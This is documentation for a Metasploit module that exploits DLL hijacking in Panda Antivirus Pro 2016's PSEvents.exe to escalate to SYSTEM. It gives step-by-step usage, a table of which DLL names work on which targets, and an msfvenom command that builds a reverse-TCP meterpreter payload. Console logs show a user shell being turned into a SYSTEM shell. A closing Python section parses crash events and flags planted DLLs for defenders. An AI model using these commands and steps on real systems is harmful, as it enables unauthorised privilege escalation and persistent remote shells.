## Vulnerable Application

  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

  The AV must be running for PSEvents.exe to execute and the module's DLL to get loaded, which can take up to an hour.  A 32-bit meterpreter seems to get caught,
  so you may need an AV exclusion for the folder to ensure the AV doesn't catch meterpreter in action.

  The Downloads folder can take 10-15 minutes to appear after install; it is populated by Panda AV downloading from the vendor:

  1. There is an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
  2. Then, right after, an HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.

## Verification Steps

  1. Install the application
  2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
  3. Start msfconsole
  4. Get a shell
  5. Do: `use exploit/windows/local/panda_psevents`
  6. Do: `set session [ID]`
  7. Do: `exploit`
  8. Go do something else while you wait
  9. Enjoy being system with your shell

## Options

  **DLL**

  The file name to give the payload DLL.  The original vulnerability write-up used bcryptPrimitives.dll and mentioned several others that could be used; however, PSEvents.exe seems to be VERY picky about which name works.  The default is cryptnet.dll.  See the chart below for more details.

| Target (Id), OS               | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll         | WININET.dll |
|-------------------------------|-------------|-------------|----------------------|---------------|----------------------|-------------|
| 64bit target (1), win10 x64   | CRASH       | CRASH       | NO                   | NO            | valid                | NO          |
| 64bit target (1), win8.1 x86  | CRASH       | CRASH       | NO                   | valid         | valid                | NO          |
| 32bit target (0), win10 x64   | CRASH       | CRASH       | NO                   | NO            | valid                | NO          |
| 32bit target (0), win8.1 x86  | CRASH       | CRASH       | NO                   | valid         | valid (caught by av) | NO          |
| 32bit target (0), win7sp1 x86 |             |             | valid                |               | valid (caught by av) |             |

In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.

  **ListenerTimeout**

  How long to wait for a shell.  PSEvents.exe runs roughly every hour, so the default is 3610 seconds (an extra 10 seconds to allow for code execution and other delays).

## Scenarios

### Windows 8.1 x86 with Panda Antivirus Pro 2016 16.1.2

  Step 1, get a local shell.  I used msfvenom to drop an exe for an easy user-level meterpreter.

    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
    payload => windows/meterpreter_reverse_tcp
    msf exploit(handler) > set lhost 192.168.2.117
    lhost => 192.168.2.117
    msf exploit(handler) > set lport 4449
    lport => 4449
    msf exploit(handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4449 
    [*] Starting the payload handler...
    [*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
    
    meterpreter > getuid
    Server username: IE11Win8_1\IEUser
    meterpreter > background
    [*] Backgrounding session 1...

  Step 2, run the Panda exploit module against that session.

    use exploit/windows/local/panda_psevents
    msf exploit(panda_psevents) > set session 1
    session => 1
    msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(panda_psevents) > set exitfunc seh
    exitfunc => seh
    msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
    DLL => CRYPTBASE.dll
    msf exploit(panda_psevents) > show options
    
    Module options (exploit/windows/local/panda_psevents):
    
       Name             Current Setting  Required  Description
       ----             ---------------  --------  -----------
       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
       ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
       SESSION          1                yes       The session to run this module on.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.2.117    yes       The listen address
       LPORT     4450             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows x86
    
    
    
    msf exploit(panda_psevents) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4450 
    [*] Uploading the Payload DLL to the filesystem...
    [*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
    [*] Start Time: 2016-09-27 18:10:21 -0400
    [*] Sending stage (957999 bytes) to 192.168.2.91
    [*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
    [+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > sysinfo
    Computer        : IE11WIN8_1
    OS              : Windows 8.1 (Build 9600).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/win32
    meterpreter > background

## Failed Exploitation Attempts

If the DLL doesn't work, PSEvents.exe will fail to run.  This is silent to the user, but an error is recorded in the Windows Application event log:

 * Event ID: 1000
 * Task Category (100)
 * Log Name: Application
 * Source: Application Error
 * Details:
```
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application start time: 0x01d218a30fbf1ac5
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name: 
Faulting package-relative application ID:
```
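As an added defender-side example (not part of the module or its documentation), the following Python parses the Event ID 1000 details shown above into fields, flags the PSEvents.exe crash signature, and checks a folder listing for the DLL names the module can plant. The sample event is copied from the entry above; the folder listing and the alert threshold logic are constructed assumptions.

```python
# Constructed sample input: the Application Error (Event ID 1000) details shown above.
SAMPLE_EVENT = r"""Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name: 
"""

# Folder PSEvents.exe runs from (compared case-insensitively).
PANDA_DOWNLOADS = r"c:\programdata\panda security\panda devices agent\downloads"
# DLL names the module documentation lists as accepted for planting.
HIJACKABLE_DLLS = {"cryptnet.dll", "cryptbase.dll", "bcryptprimitives.dll"}
# 0xc0000374 is STATUS_HEAP_CORRUPTION, the code seen when a bad DLL is loaded.
HEAP_CORRUPTION = "0xc0000374"


def parse_app_error(details: str) -> dict:
    """Turn the 'key: value' lines of an Application Error event into a dict.
    Trailing 'version: ...' / 'time stamp: ...' pairs on a line are stored under
    the same subject as the line's first key, e.g. 'faulting module version'."""
    fields = {}
    for line in details.splitlines():
        if ":" not in line:
            continue
        segments = line.split(", ")
        key, _, value = segments[0].partition(":")
        key = key.strip().lower()
        fields[key] = value.strip()
        subject = key.rsplit(" ", 1)[0]
        for seg in segments[1:]:
            k, sep, v = seg.partition(":")
            if sep:
                fields[f"{subject} {k.strip().lower()}"] = v.strip()
    return fields


def is_psevents_crash(fields: dict) -> bool:
    """Alert condition: PSEvents.exe faulted while running out of the Panda
    Downloads folder with a heap-corruption exception code."""
    app = fields.get("faulting application name", "").lower()
    path = fields.get("faulting application path", "").lower()
    code = fields.get("exception code", "").lower()
    return app == "psevents.exe" and path.startswith(PANDA_DOWNLOADS) and code == HEAP_CORRUPTION


def planted_dlls(listing) -> list:
    """Return names from a Downloads\\<hash> folder listing matching the plantable DLL names."""
    return sorted(name for name in listing if name.lower() in HIJACKABLE_DLLS)
```

A successful hijack produces no Event 1000 at all, so the folder check is the complementary signal: a hijackable DLL name sitting beside PSEvents.exe in that folder is worth investigating even without a crash.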
